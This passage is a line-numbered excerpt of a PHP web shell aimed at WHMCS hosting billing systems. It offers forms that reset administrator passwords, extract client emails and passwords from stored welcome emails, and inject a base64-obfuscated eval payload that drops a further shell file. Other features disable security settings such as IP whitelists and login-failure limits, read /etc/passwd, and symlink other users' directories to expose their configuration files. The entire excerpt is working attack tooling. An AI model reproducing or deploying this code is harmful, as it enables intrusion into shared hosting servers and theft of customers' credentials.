  3215. $okenuke4 = "UPDATE $table_name2 SET pwd ='".$ganti_pass."' WHERE radminsuper ='1'";
  3216.  
  3217. $oke=@mysql_query($okenuke1);
  3218. $oke=@mysql_query($okenuke2);
  3219. $oke=@mysql_query($okenuke3);
  3220. $oke=@mysql_query($okenuke4);
  3221. if($oke)
  3222. {
  3223. echo "<center><font color='lime'>SUKSES BOS GANTENG :P</font>";
  3224. }
  3225. }
  3226.  
  3227. if($_GET['ceck']=="whmcs"){
  3228. set_time_limit(0);
  3229. ?>
  3230. <p><br/><body>
  3231. <center><img src="http://www.nextgenhost.net/icons/logo-cpanel-whm.png"> <br/><br/><nobr><b><span class="b7">O=:[ CHECK WHMCS</span> <span class="b8">LICENSE & VERSION ]:=O</span></b></nobr><br/><br/>
  3232. <p><form method="post">
  3233. <table border=1>
  3234. <tr><td>Hosting Site </td><td><input type="text" style="color:#FF0000;background-color:#000000" size="60" value="http://" name="url"></td></tr>
  3235. <tr><td align="center" colspan="2"><input class=submit type="submit" style="color:#FF0000;background-color:#000000" value=" HAJAR BOS " name="plapon"></td></tr></table>
  3236. <br></form></center>
  3237.  
  3238. <?php
  3239. @error_reporting(0);
  3240. @ini_set('log_errors',0);
  3241. @ini_set('error_log',NULL);
  3242. if(isset($_POST['plapon'])){
  3243. $target = $_POST['url'];
  3244. $bukadikitjoss = fopen("$target/?licensedebug","r");
  3245. $hasil = '';
  3246. while (!feof($bukadikitjoss)) {
  3247. $hasil .= fread($bukadikitjoss, 8192);
  3248. }
  3249. echo "<center><textarea style='color:#FF0000;background-color:#000000' cols='40' rows='15'>$hasil</textarea>";
  3250. }
  3251. echo "</table>";
  3252. }
  3253.  
  3254. if($_GET['whmcs']=="client"){
  3255. set_time_limit(0);
  3256. ?>
  3257. <p><br/><body>
  3258. <center><img src="http://www.nextgenhost.net/icons/logo-cpanel-whm.png"> <br/><br/><nobr><b><span class="b7">O=:[ GRAB PASSWORD</span> <span class="b8">CLIENT HOSTING ]:=O</span></b></nobr><br/><br/>
  3259. <p><form method="post">
  3260. <table border=1>
  3261. <tr><td>db_host </td><td><input type="text" style="color:#FF0000;background-color:#000000" size="60" name="anu1" value="localhost"></td></tr>
  3262. <tr><td>db_username </td><td><input type="text" style="color:#FF0000;background-color:#000000" size="60" name="anu2"></td></tr>
  3263. <tr><td>db_password</td><td><input type="text" style="color:#FF0000;background-color:#000000" size="60" name="anu3"></td></tr>
  3264. <tr><td>db_name</td><td><input type="text" style="color:#FF0000;background-color:#000000" size="60" name="anu4"></td></tr>
  3265. <tr><td align="center" colspan="2"><input class=submit type="submit" style="color:#FF0000;background-color:#000000" value=" HAJAR BOS " name="plapon"></td></tr>
  3266.  
  3267. </table>
  3268. <br></form></center>
  3269.  
  3270. <?php
  3271. if(isset($_POST['plapon'])) {
  3272.  
  3273. $perawan = $_POST['anu1'];
  3274. $kimcil = $_POST['anu2'];
  3275. $janda = $_POST['anu3'];
  3276. $hotel = $_POST['anu4'];
  3277. function get_string_between($string, $start, $end){
  3278. $string = " ".$string;
  3279. $ini = strpos($string,$start);
  3280. if ($ini == 0) return "";
  3281. $ini += strlen($start);
  3282. $len = strpos($string,$end,$ini) - $ini;
  3283. return substr($string,$ini,$len);
  3284. }
  3285. @mysql_connect($perawan,$kimcil,$janda);
  3286. @mysql_select_db($hotel) or die ("Gagal Koneksi Ke Database");
  3287. $query="select subject,message from tblemails";
  3288. $result=mysql_query($query);
  3289. mysql_close();
  3290. $num=mysql_numrows($result);
  3291. $i=0;
  3292. while ($i < $num) {
  3293. $css =mysql_result($result,$i,"subject");echo "<br/><br/><center><table class='explore' style=width:830px;padding:0 1px;>
  3294. <tr><th colspan='7'> <span class='b7'>O=:[ HOST ROOT ]:=O</span> </th></tr><tr>
  3295. <th align='center'><b>CLIENT EMAIL</b></th>
  3296. <th align='center'><b>CLIENT PASSWORD</b></th>
  3297. </tr>";
  3298.  
  3299.  
  3300. if(stristr($css,"Welcome")){
  3301. $s =mysql_result($result,$i,"message");
  3302. if(stristr($s,"Login Username: ") or stristr($s,"Email Address: ")){
  3303. $mail= get_string_between($s,"Login Username: ","<br />");
  3304. $m2 = get_string_between($s,"Email Address: ","<br />");
  3305. $pass = get_string_between($s,"Password: ","</p>");
  3306. print $mail.$m2.":".$pass."<br>";
  3307.  
  3308. echo "<tr>
  3309. <td align='center'>$mail.$m2.</td>
  3310. <td align='center'>".$pass."</td>
  3311. </tr>";
  3312. }
  3313. }
  3314. ++$i;
  3315. }
  3316. }
  3317. echo "</table>";
  3318. }
  3319.  
  3320. if($_GET['whmcs']=="shell"){
  3321. set_time_limit(0);
  3322. ?>
  3323. <p><br/><body>
  3324. <center><img src="http://www.nextgenhost.net/icons/logo-cpanel-whm.png"> <br/><br/><nobr><b><span class="b7">O=:[ INJECT </span> <span class="b8">SHELL ]:=O</span></b></nobr><br/><br/>
  3325. <p><form method="post">
  3326. <table border=1>
  3327. <tr><td>db_host </td><td><input type="text" style="color:#FF0000;background-color:#000000" size="80" name="anu1" value="localhost"></td></tr>
  3328. <tr><td>db_username </td><td><input type="text" style="color:#FF0000;background-color:#000000" size="80" name="anu2"></td></tr>
  3329. <tr><td>db_password</td><td><input type="text" style="color:#FF0000;background-color:#000000" size="80" name="anu3"></td></tr>
  3330. <tr><td>db_name</td><td><input type="text" style="color:#FF0000;background-color:#000000" size="80" name="anu4"></td></tr>
  3331. <tr><td align="center" colspan="2"> <textarea style='color:red;background-color:#000000' rows='10' cols='67'
  3332. name=shell>{php}eval(base64_decode('JGMwZGUgID0gYmFzZTY0X2RlY29kZSgnUjBsR09EbGhVRHM4Y0NCaGJHbG5iajBpWTJWdWRHVnlJajROQ2cwS1BEOXdhSEFOQ21WeWNtOXlYM0psY0c5eWRHbHVaeWd3S1RzTkNpUnpZM0pwY0hSdVlXMWxJRDBnSkY5VFJWSldSVkpiSjFORFVrbFFWRjlPUVUxRkoxMDdEUW9rWm1sc1pXNWhiV1VnUFNBa1gxQlBVMVJiSW1acGJHVnVZVzFsSWwwN0RRcHBaaWdrWDFCUFUxUmJJbk4xWW0xcGRDSmRJRDA5SUNKUGNHVnVJaWtOQ25zTkNtbG1LR1pwYkdWZlpYaHBjM1J6S0NSbWFXeGxibUZ0WlNrcERRcDdEUW9rWm1sc1pXTnZiblJsYm5SeklEMGdhSFJ0YkdWdWRHbDBhV1Z6S0dacGJHVmZaMlYwWDJOdmJuUmxiblJ6S0NSbWFXeGxibUZ0WlNrcE93MEthV1lvSVNSbWFXeGxZMjl1ZEdWdWRITXBEUW9rYzNSaGRIVnpJRDBnSWp4bWIyNTBJR1poWTJVOUoxWmxjbVJoYm1FbklITjBlV3hsUFNkbWIyNTBMWE5wZW1VNklEaHdkQ2MrUlhKeWIzSWdUbTkwYUdsdVp5QkdhV3hsUEM5bWIyNTBQaUk3RFFwOURRcGxiSE5sRFFva2MzUmhkSFZ6SUQwZ0lqeG1iMjUwSUdaaFkyVTlKMVpsY21SaGJtRW5JSE4wZVd4bFBTZG1iMjUwTFhOcGVtVTZJRGh3ZENjK1JtbHNaU0JrYjJWeklHNXZkQ0JsZUdsemRDRThMMlp2Ym5RK0lqc05DbjBKQ1EwS1pXeHpaU0JwWmlna1gxQlBVMVJiSW5OMVltMXBkQ0pkSUQwOUlDSkVaV3hsZEdVaUtRMEtldzBLYVdZb1ptbHNaVjlsZUdsemRITW9KR1pwYkdWdVlXMWxLU2tOQ25zTkNtbG1LSFZ1YkdsdWF5Z2tabWxzWlc1aGJXVXBLUWtOQ2lSemRHRjBkWE1nUFNBaVBHWnZiblFnWm1GalpUMG5WbVZ5WkdGdVlTY2djM1I1YkdVOUoyWnZiblF0YzJsNlpUb2dPSEIwSno1R2FXeGxJSE4xWTJObGMzTm1kV3hzZVNCa1pXeGxkR1ZrSVR3dlptOXVkRDRpT3cwS1pXeHpaUTBLSkhOMFlYUjFjeUE5SUNJOFptOXVkQ0JtWVdObFBTZFdaWEprWVc1aEp5QnpkSGxzWlQwblptOXVkQzF6YVhwbE9pQTRjSFFuUGtOdmRXeGtJRzV2ZENCa1pXeGxkR1VnWm1sc1pTRThMMlp2Ym5RK0lqc05DbjBOQ21Wc2MyVU5DaVJ6ZEdGMGRYTWdQU0FpUEdadmJuUWdabUZqWlQwblZtVnlaR0Z1WVNjZ2MzUjViR1U5SjJadmJuUXRjMmw2WlRvZ09IQjBKejVHYVd4bElHUnZaWE1nYm05MElHVjRhWE4wSVR3dlptOXVkRDRpT3cwS2ZRMEtaV3h6WlNCcFppZ2tYMUJQVTFSYkluTjFZbTFwZENKZElEMDlJQ0pUWVhabElpa05DbnNOQ2lSbWFXeGxZMjl1ZEdWdWRITWdQU0J6ZEhKcGNITnNZWE5vWlhNb2FIUnRiRjlsYm5ScGRIbGZaR1ZqYjJSbEtDUmZVRTlUVkZzaVkyOXVkR1Z1ZEhNaVhTa3BPdzBLYVdZb1ptbHNaVjlsZUdsemRITW9KR1pwYkdWdVlXMWxLU2tOQ25WdWJHbHVheWdrWm1sc1pXNWhiV1VwT3cwS0pHaGhibVJzWlNBOUlHWnZjR1Z1S0NSbWFXeGxibUZ0WlN3Z0luY2lLVHNOQ21sbUtDRWthR0Z1Wkd4bEtRMEtKSE4wWVhSMWN5QTlJQ0k4Wm05dWRDQm1ZV05sUFNkV1pYSmtZVzVoSnlCemRIbHNaVDBuWm05dWRDMXphWHBsT2lBNGNIUW5Qa052ZFd4a0lHNXZkQ0J2Y0dWdUlHWnBiR1VnWm05eUlIZHlhWFJsSUdGalkyVnpjeUVnUEM5bWIyNTBQaUk3RFFwbGJITmxEUXA3RFFwcFppZ2habmR5YVhSbEtDUm9ZVzVrYkdVc0lDUm1hV3hsWTI5dWRHVnVkSE1wS1EwS0pITjBZWFIxY3lBOUlDUnpkR0YwZFhNdUlqeG1iMjUwSUdaaFkyVTlKMVpsY21SaGJtRW5JSE4wZVd4bFBTZG1iMjUwTFhOcGVtVTZJRGh3ZENjK1EyOTFiR1FnYm05MElIZHlhWFJsSUhSdklHWnBiR1VoSUNoTllYbGlaU0I1YjNVZ1pHbGtiaWQwSUdWdWRHVnlJR0Z1ZVNCMFpYaDBQeWs4TDJadmJuUStJanNOQ21aamJHOXpaU2drYUdGdVpHeGxLVHNOQ24wTkNpUm1hV3hsWTI5dWRHVnVkSE1nUFNCb2RHMXNaVzUwYVhScFpYTW9KR1pwYkdWamIyNTBaVzUwY3lrN0RRcDlEUXBsYkhObERRcDdEUW9rYzNSaGRIVnpJRDBnSWp4bWIyNTBJR1poWTJVOUoxWmxjbVJoYm1FbklITjBlV3hsUFNkbWIyNTBMWE5wZW1VNklEaHdkQ2MrVG04Z1ptbHNaU0JzYjJGa1pXUWhQQzltYjI1MFBpSTdEUXA5RFFvL1BnMEtQSFJoWW14bElHSnZjbVJsY2owaU1DSWdZV3hwWjI0OUltTmxiblJsY2lJK1BIUnlQangwWkQ0OGRHRmliR1VnZDJsa2RHZzlJakV3TUNVaUlHSnZjbVJsY2owaU1DSStQSFJ5UGp4MFpENE5DanhtYjNKdElHMWxkR2h2WkQwaWNHOXpkQ0lnWVdOMGFXOXVQU0k4UDBWamFHOGdKSE5qY21sd2RHNWhiV1U3UHo0aVBnMEtQR2x1Y0hWMElITjBlV3hsUFNKamIyeHZjanBzYVcxbE8ySmhZMnRuY205MWJtUXRZMjlzYjNJNkl6QXdNREF3TUNJZ2JtRnRaVDBpWm1sc1pXNWhiV1VpSUhSNWNHVTlJblJsZUhRaUlIWmhiSFZsUFNJOFAwVmphRzhnSkdacGJHVnVZVzFsT3o4K0lpQnphWHBsUFNJM01pSStEUW84YVc1d2RYUWdkSGx3WlQwaWMzVmliV2wwSWlCemRIbHNaVDBpWTI5c2IzSTZiR2x0WlR0aVlXTnJaM0p2ZFc1a0xXTnZiRzl5T2lNd01EQXdNREFpSUc1aGJXVTlJbk4xWW0xcGRDSWdkbUZzZFdVOUlrOXdaVzRpUGcwS1BHbHVjSFYwSUhSNWNHVTlJbk4xWW0xcGRDSWdjM1I1YkdVOUltTnZiRzl5T214cGJXVTdZbUZqYTJkeWIzVnVaQzFqYjJ4dmNqb2pNREF3TURBd0lpQnVZVzFsUFNKemRXSnRhWFFpSUhaaGJIVmxQU0pFWld4bGRHVWlQand2ZEdRK1BDOTBjajQ4TDNSaFlteGxQZzBLUEdadmJuUWdabUZqWlQwaVZtVnlaR0Z1WVNJZ2MzUjViR1U5SW1admJuUXRjMmw2WlRvZ01URndkQ0krRFFvOGRHVjRkR0Z5WldFZ2JtRnRaVDBpWTI5dWRHVnVkSE1pSUhOMGVXeGxQU0pqYjJ4dmNqcHNhVzFsTzJKaFkydG5jbTkxYm1RdFkyOXNiM0k2SXpBd01EQXdNQ0lnWTI5c2N6MGlOekFpSUhKdmQzTTlJakkxSWo0TkNqdy9SV05vYnlBa1ptbHNaV052Ym5SbGJuUnpPejgrUEM5MFpYaDBZWEpsWVQ0OEwyWnZiblErUEdKeVBnMEtQR2x1Y0hWMElIUjVjR1U5SW5OMVltMXBkQ0lnYzNSNWJHVTlJbU52Ykc5eU9teHBiV1U3WW1GamEyZHliM1Z1WkMxamIyeHZjam9qTURBd01EQXdJaUJ1WVcxbFBTSnpkV0p0YVhRaUlIWmhiSFZsUFNKVFlYWmxJajROQ2p4cGJuQjFkQ0IwZVhCbFBTSnlaWE5sZENJZ2MzUjViR1U5SW1OdmJHOXlPbXhwYldVN1ltRmphMmR5YjNWdVpDMWpiMnh2Y2pvak1EQXdNREF3SWlCMllXeDFaVDBpVW1WelpYUWlQZzBLUEM5bWIzSnRQZzBLUEhBK0RRbzhhRE0rWDFWUVRFOUJSQ0JHU1V4Rlh6eG9NejROQ2cwS1BEOXdhSEFOQ2cwS1pXTm9ieUFuUEdadmNtMGdZV04wYVc5dVBTSWlJRzFsZEdodlpEMGljRzl6ZENJZ1pXNWpkSGx3WlQwaWJYVnNkR2x3WVhKMEwyWnZjbTB0WkdGMFlTSWdibUZ0WlQwaWRYQnNiMkZrWlhJaUlHbGtQU0oxY0d4dllXUmxjaUkrSnpzTkNnMEtaV05vYnlBblVFRlVTQ0JVUVZKSFJWUWdPaUE4YVc1d2RYUWdibUZ0WlQwaWRYQnNiMkZrZEc4aUlITjBlV3hsUFNKamIyeHZjanBzYVcxbE8ySmhZMnRuY205MWJtUXRZMjlzYjNJNkl6QXdNREF3TUNJZ2RIbHdaVDBpZEdWNGRDSWdjMmw2WlQwaU5UQWlJSFpoYkhWbFBTSW5MbWRsZEdOM1pDZ3BMaWNpUGp4aWNpQXZQaWM3RFFwbFkyaHZJQ2M4YVc1d2RYUWdkSGx3WlQwaVptbHNaU0lnYzNSNWJHVTlJbU52Ykc5eU9teHBiV1U3WW1GamEyZHliM1Z1WkMxamIyeHZjam9qTURBd01EQXdJaUJ1WVcxbFBTSm1hV3hsSWlCemFYcGxQU0l6TUNJK1BHbHVjSFYwSUc1aGJXVTlJbDkxY0d3aUlITjBlV3hsUFNKamIyeHZjanBzYVcxbE8ySmhZMnRuY205MWJtUXRZMjlzYjNJNkl6QXdNREF3TUNJZ2RIbHdaVDBpYzNWaWJXbDBJaUJwWkQwaVgzVndiQ0lnZG1Gc2RXVTlJbFZ3Ykc5aFpDSStQQzltYjNKdFBpYzdEUXBwWmlnZ0pGOVFUMU5VV3lkZmRYQnNKMTBnUFQwZ0lsVndiRzloWkNJZ0tTQjdEUXBwWmloQVkyOXdlU2drWDBaSlRFVlRXeWRtYVd4bEoxMWJKM1J0Y0Y5dVlXMWxKMTBzSUNSZlVFOVRWRnNuZFhCc2IyRmtkRzhuWFM0bkx5Y3VKRjlHU1V4RlUxc25abWxzWlNkZFd5ZHVZVzFsSjEwcEtTQjdEUW9OQ21WamFHOGdKenhtYjI1MElHTnZiRzl5UFNKc2FXMWxJajViSzEwZ1ZYQnNiMkZrSUZOMWEzTmxjeUE2ZGlBOFluSXZQaUJiSzEwZ0p5NGtYMUJQVTFSYkozVndiRzloWkhSdkoxMHVJaThpTGlSZlJrbE1SVk5iSjJacGJHVW5YVnNuYm1GdFpTZGRPdzBLZlNCbGJITmxJSHNOQ21WamFHOGdKMXQrWFNCVmNHeHZZV1FnUm1GcGJHVmtJRlJmVkNCYmZsMDhMMlp2Ym5RK1BHSnlQaWM3RFFwOUlIME5DajgrRFFvPScpOw0KDQokZm9wZW4gPSBmb3BlbiAoJ2RtLnBocCcsJ3cnKTsNCiR3cml0ZSAgPSBmd3JpdGUoJGZvcGVuICwgJGMwZGUpOw=='));{/php}</textarea>
  3333. </td></tr>
  3334. <tr><td align="center" colspan="2"><input class=submit type="submit" style="color:#FF0000;background-color:#000000" value=" HAJAR BOS " name="plapon"></td></tr>
  3335. </table>
  3336. <br>
  3337. </form>
  3338. </center>
  3339. <?php
  3340. if(isset($_POST['plapon'])) {
  3341. $anu1 = $_POST['anu1'];
  3342. $anu2 = $_POST['anu2'];
  3343. $anu3 = $_POST['anu3'];
  3344. $anu4 = $_POST['anu4'];
  3345. @mysql_connect($anu1,$anu2,$anu3);
  3346. @mysql_select_db($anu4);
  3347. $shell=str_replace("'","'",$shell);
  3348. $gosok_shell = $_POST['shell'];
  3349. $colok = "UPDATE tblemailtemplates SET message ='".$gosok_shell."' WHERE subject ='Welcome'";
  3350. $udah_ganteng=@mysql_query($colok);if($udah_ganteng)
  3351. {
  3352. echo "<font color='lime'>SUKSES BOS GANTENG :P</font>";
  3353. }
  3354. }
  3355. }
  3356.  
  3357.  
  3358.  
  3359. if($_GET['whmcs']=="token"){
  3360. set_time_limit(0);
  3361. ?>
  3362. <p><br/><body>
  3363. <center><img src="http://www.nextgenhost.net/icons/logo-cpanel-whm.png"> <br/><br/><nobr><b><span class="b7">O=:[ BYPASS </span> <span class="b8">TOKEN ]:=O</span></b></nobr><br/><br/>
  3364. <p><form method="post">
  3365. <table border=1>
  3366. <tr><td>db_host </td><td><input type="text" style="color:#FF0000;background-color:#000000" size="60" name="anu1" value="localhost"></td></tr>
  3367. <tr><td>db_username </td><td><input type="text" style="color:#FF0000;background-color:#000000" size="60" name="anu2"></td></tr>
  3368. <tr><td>db_password</td><td><input type="text" style="color:#FF0000;background-color:#000000" size="60" name="anu3"></td></tr>
  3369. <tr><td>db_name</td><td><input type="text" style="color:#FF0000;background-color:#000000" size="60" name="anu4"></td></tr>
  3370. <tr><td align="center" colspan="2"><input class=submit type="submit" style="color:#FF0000;background-color:#000000" value=" HAJAR BOS " name="plapon"></td></tr>
  3371. </table>
  3372. <br>
  3373. </FORM>
  3374. </center>
  3375. <?php
  3376. if(isset($_POST['plapon'])) {
  3377.  
  3378. $anu1 = $_POST['anu1'];
  3379. $anu2 = $_POST['anu2'];
  3380. $anu3 = $_POST['anu3'];
  3381. $anu4 = $_POST['anu4'];
  3382. @mysql_connect($anu1,$anu2,$anu3);
  3383. @mysql_select_db($anu4);
  3384.  
  3385. $crot1 = "UPDATE tblconfiguration SET value='' WHERE setting='InvalidLoginBanLength'";
  3386. $crot2 = "UPDATE tblconfiguration SET value='' WHERE setting='AdminForceSSL'";
  3387. $crot3 = "UPDATE tblconfiguration SET value='' WHERE setting='RequiredPWStrength'";
  3388. $crot4 = "UPDATE tblconfiguration SET value='' WHERE setting='MaintenanceMode'";
  3389. $crot5 = "UPDATE tblconfiguration SET value='' WHERE setting='APIAllowedIPs'";
  3390. $crot6 = "UPDATE tblconfiguration SET value='' WHERE setting='LoginFailures'";
  3391. $crot7 = "UPDATE tblconfiguration SET value='' WHERE setting='InstanceID'";
  3392. $crot8 = "UPDATE tblconfiguration SET value='' WHERE setting='WhitelistedIPs'";
  3393. $crot9 = "UPDATE tblconfiguration SET value='' WHERE setting='ToggleInfoPopup'";$crot10 = "UPDATE tblconfiguration SET value='' WHERE setting='token_namespaces'";
  3394.  
  3395. $udah_ganteng=@mysql_query($crot1);
  3396. $udah_ganteng=@mysql_query($crot2);
  3397. $udah_ganteng=@mysql_query($crot3);
  3398. $udah_ganteng=@mysql_query($crot4);
  3399. $udah_ganteng=@mysql_query($crot5);
  3400. $udah_ganteng=@mysql_query($crot6);
  3401. $udah_ganteng=@mysql_query($crot7);
  3402. $udah_ganteng=@mysql_query($crot8);
  3403. $udah_ganteng=@mysql_query($crot9);
  3404. $udah_ganteng=@mysql_query($crot10);
  3405.  
  3406. if($udah_ganteng)
  3407. {
  3408. echo "<font color='lime'>SUKSES BOS GANTENG :P</font>";
  3409. }
  3410. }
  3411. }
  3412.  
  3413. if($_GET['whmcs']=="scan"){
  3414. set_time_limit(0);
  3415.  
  3416. echo '<br><br><body bgcolor=black><center>
  3417. <img src="http://www.nextgenhost.net/icons/logo-cpanel-whm.png"><br/><br/>
  3418. <nobr><span class="b7">O=:[ SCAN CMS</span> <span class="b8">WHMCS ]:=O</nobr></span><br/><br/>
  3419. <form method="POST">
  3420. <center>
  3421. <textarea style="color:red;background-color:#000000" cols="60" name="passwd" rows="20">';
  3422. $uSr=file("/etc/passwd");
  3423. foreach($uSr as $usrr)
  3424. {
  3425. $str=explode(":",$usrr);
  3426. echo $str[0]."\n";
  3427. }
  3428. ?>
  3429.  
  3430. </textarea><p>
  3431. <nobr><font style="color:red;background-color:#000000">
  3432. [~] Home :
  3433. <select style="color:red;background-color:#000000" title="Select Target Home" name="home" size="10">
  3434. <option title="home" value="home">home</option>
  3435. <option title="home2" value="home2">home2</option>
  3436. <option title="home3" value="home3">home3</option>
  3437. <option title="home4" value="home4">home4</option>
  3438. <option title="home5" value="home5">home5</option>
  3439. <option title="home6" value="home6">home6</option>
  3440. <option title="home7" value="home7">home7</option>
  3441. <option title="home8" value="home8">home8</option>
  3442. <option title="home9" value="home9">home9</option>
  3443. <option title="home10" value="home10">home10</option>
  3444. </select>&nbsp;&nbsp;&nbsp; [~] Htaccess :
  3445. <select style="color:red;background-color:#000000" title="Select Software" name="soft" size="10">
  3446. <option title="Apache" value="Options all
  3447. Options +Indexes
  3448. Options +FollowSymLinks
  3449. DirectoryIndex Sux.html
  3450. AddType text/plain .php
  3451. AddHandler server-parsed .php
  3452. AddType text/plain .html
  3453. AddHandler txt .html
  3454. Require None
  3455. Satisfy Any">Apache</option>
  3456. <option title="Litespeed" value="
  3457. Options +FollowSymLinks
  3458. DirectoryIndex seees.html
  3459. RemoveHandler .php
  3460. AddType application/octet-stream .php ">Litespeed</option>
  3461.  
  3462. </select> &nbsp;&nbsp; <input style="color:red;background-color:#000000" name="anu" size="10"
  3463. value="<< &nbsp;START SCAN&nbsp; >>" type="submit">
  3464. <br/><br/></form></center>
  3465.  
  3466. <?php
  3467. @ini_set('html_errors',0);
  3468. @ini_set('max_execution_time',0);
  3469. @ini_set('display_errors', 0);
  3470. @ini_set('file_uploads',1);
  3471. if ($_POST['anu']) {
  3472. $path = $_POST['path'];
  3473. $home = $_POST['home'];
  3474.  
  3475. $functions=@ini_get("disable_functions");
  3476. if(eregi("symlink",$functions))
  3477. {
  3478. die ('Kurang Ganteng Cok');
  3479. }
  3480. @mkdir(WHMCS, 0755);
  3481. @chdir(WHMCS);
  3482.  
  3483.  
  3484.  
  3485. $htaccess=$_POST['soft'];
  3486. file_put_contents(".htaccess",$htaccess,FILE_APPEND);
  3487.  
  3488. $passwd=explode("\n",$_POST["passwd"]);
  3489. foreach($passwd as $pwd){
  3490. $user=trim($pwd);
  3491.  
  3492. @symlink('/'.$home.'/'.$user.'/public_html/suspended.page/index.html',$user.' <~ RESELLER');
  3493.  
  3494. @symlink('/'.$home.'/'.$user.'/public_html/modules/registrars/',$user.' <~ WHMCS-1'); @symlink('/'.$home.'/'.$user.'/public_html/account/modules/registrars/',$user.' <~ WHMCS-2');
  3495. @symlink('/'.$home.'/'.$user.'/public_html/accounts/modules/registrars/',$user.' <~ WHMCS-3');
  3496. @symlink('/'.$home.'/'.$user.'/public_html/central/modules/registrars/',$user.' <~ WHMCS-4');
  3497. @symlink('/'.$home.'/'.$user.'/public_html/clienti/modules/registrars/',$user.' <~ WHMCS-5');
  3498. @symlink('/'.$home.'/'.$user.'/public_html/client/modules/registrars/',$user.' <~ WHMCS-6');
  3499. @symlink('/'.$home.'/'.$user.'/public_html/cliente/modules/registrars/',$user.' <~ WHMCS-7');
  3500. @symlink('/'.$home.'/'.$user.'/public_html/clientes/modules/registrars/',$user.' <~ WHMCS-8');
  3501. @symlink('/'.$home.'/'.$user.'/public_html/clients/modules/registrars/',$user.' <~ WHMCS-9');
  3502. @symlink('/'.$home.'/'.$user.'/public_html/clientarea/modules/registrars/',$user.' <~ WHMCS-9');
  3503. @symlink('/'.$home.'/'.$user.'/public_html/clientsarea/modules/registrars/',$user.' <~ WHMCS-10');
  3504. @symlink('/'.$home.'/'.$user.'/public_html/client-area/modules/registrars/',$user.' <~ WHMCS-11');
  3505. @symlink('/'.$home.'/'.$user.'/public_html/clients-area/modules/registrars/',$user.' <~ WHMCS-12');
  3506. @symlink('/'.$home.'/'.$user.'/public_html/clientzone/modules/registrars/',$user.' <~ WHMCS-13');
  3507. @symlink('/'.$home.'/'.$user.'/public_html/client-zone/modules/registrars/',$user.' <~ WHMCS-14');
  3508. @symlink('/'.$home.'/'.$user.'/public_html/core/modules/registrars/',$user.' <~ WHMCS-15');
  3509. @symlink('/'.$home.'/'.$user.'/public_html/company/modules/registrars/',$user.' <~ WHMCS-16');
  3510. @symlink('/'.$home.'/'.$user.'/public_html/customer/modules/registrars/',$user.' <~ WHMCS-17');
  3511. @symlink('/'.$home.'/'.$user.'/public_html/customers/modules/registrars/',$user.' <~ WHMCS-18');
  3512. @symlink('/'.$home.'/'.$user.'/public_html/bill/modules/registrars/',$user.' <~ WHMCS-19');
  3513. @symlink('/'.$home.'/'.$user.'/public_html/billing/modules/registrars/',$user.' <~ WHMCS-20');
  3514. @symlink('/'.$home.'/'.$user.'/public_html/finance/modules/registrars/',$user.' <~ WHMCS-21');
  3515. @symlink('/'.$home.'/'.$user.'/public_html/financeiro/modules/registrars/',$user.' <~ WHMCS-22');
  3516. @symlink('/'.$home.'/'.$user.'/public_html/host/modules/registrars/',$user.' <~ WHMCS-23');
  3517. @symlink('/'.$home.'/'.$user.'/public_html/hosts/modules/registrars/',$user.' <~ WHMCS-24');
  3518. @symlink('/'.$home.'/'.$user.'/public_html/hosting/modules/registrars/',$user.' <~ WHMCS-25');
  3519. @symlink('/'.$home.'/'.$user.'/public_html/hostings/modules/registrars/',$user.' <~ WHMCS'-26);
  3520. @symlink('/'.$home.'/'.$user.'/public_html/klien/modules/registrars/',$user.' <~ WHMCS-27');
  3521. @symlink('/'.$home.'/'.$user.'/public_html/manage/modules/registrars/',$user.' <~ WHMCS-28');
  3522. @symlink('/'.$home.'/'.$user.'/public_html/manager/modules/registrars/',$user.' <~ WHMCS-29');
  3523. @symlink('/'.$home.'/'.$user.'/public_html/member/modules/registrars/',$user.' <~ WHMCS-30');
  3524. @symlink('/'.$home.'/'.$user.'/public_html/members/modules/registrars/',$user.' <~ WHMCS-31');
  3525. @symlink('/'.$home.'/'.$user.'/public_html/my/modules/registrars/',$user.' <~ WHMCS-32');
  3526. @symlink('/'.$home.'/'.$user.'/public_html/myaccount/modules/registrars/',$user.' <~ WHMCS-33');
  3527. @symlink('/'.$home.'/'.$user.'/public_html/my-account/client/modules/registrars/',$user.' <~ WHMCS-34');
  3528. @symlink('/'.$home.'/'.$user.'/public_html/myaccounts/modules/registrars/',$user.' <~ WHMCS-35');
  3529. @symlink('/'.$home.'/'.$user.'/public_html/my-accounts/modules/registrars/',$user.' <~ WHMCS-36');
  3530. @symlink('/'.$home.'/'.$user.'/public_html/order/modules/registrars/',$user.' <~ WHMCS-37');
  3531. @symlink('/'.$home.'/'.$user.'/public_html/orders/modules/registrars/',$user.' <~ WHMCS-38');
  3532. @symlink('/'.$home.'/'.$user.'/public_html/painel/modules/registrars/',$user.' <~ WHMCS-39');
  3533. @symlink('/'.$home.'/'.$user.'/public_html/panel/modules/registrars/',$user.' <~ WHMCS-40');
  3534. @symlink('/'.$home.'/'.$user.'/public_html/panels/modules/registrars/',$user.' <~ WHMCS-41');
  3535. @symlink('/'.$home.'/'.$user.'/public_html/portal/modules/registrars/',$user.' <~ WHMCS-42');
  3536. @symlink('/'.$home.'/'.$user.'/public_html/portals/modules/registrars/',$user.' <~ WHMCS-43');
  3537. @symlink('/'.$home.'/'.$user.'/public_html/secure/modules/registrars/',$user.' <~ WHMCS-44');
  3538. @symlink('/'.$home.'/'.$user.'/public_html/support/modules/registrars/',$user.' <~ WHMCS-45');
  3539. @symlink('/'.$home.'/'.$user.'/public_html/supporte/modules/registrars/',$user.' <~ WHMCS-46');
  3540. @symlink('/'.$home.'/'.$user.'/public_html/supports/modules/registrars/',$user.' <~ WHMCS-47');
  3541. @symlink('/'.$home.'/'.$user.'/public_html/web/modules/registrars/',$user.' <~ WHMCS-48');
  3542. @symlink('/'.$home.'/'.$user.'/public_html/webhost/modules/registrars/',$user.' <~ WHMCS-49');
  3543. @symlink('/'.$home.'/'.$user.'/public_html/webhosting/modules/registrars/',$user.' <~ WHMCS-50');
  3544. @symlink('/'.$home.'/'.$user.'/public_html/whm/modules/registrars/',$user.' <~ WHMCS-51');
  3545. @symlink('/'.$home.'/'.$user.'/public_html/whmcs/modules/registrars/',$user.' <~ WHMCS-52');
  3546. @symlink('/'.$home.'/'.$user.'/public_html/whmcs2/modules/registrars/',$user.' <~ WHMCS-53');
  3547. @symlink('/'.$home.'/'.$user.'/public_html/Whm/modules/registrars/',$user.' <~ WHMCS-54');
  3548. @symlink('/'.$home.'/'.$user.'/public_html/Whmcs/modules/registrars/',$user.' <~ WHMCS-55');
  3549. @symlink('/'.$home.'/'.$user.'/public_html/WHM/modules/registrars/',$user.' <~ WHMCS-56');
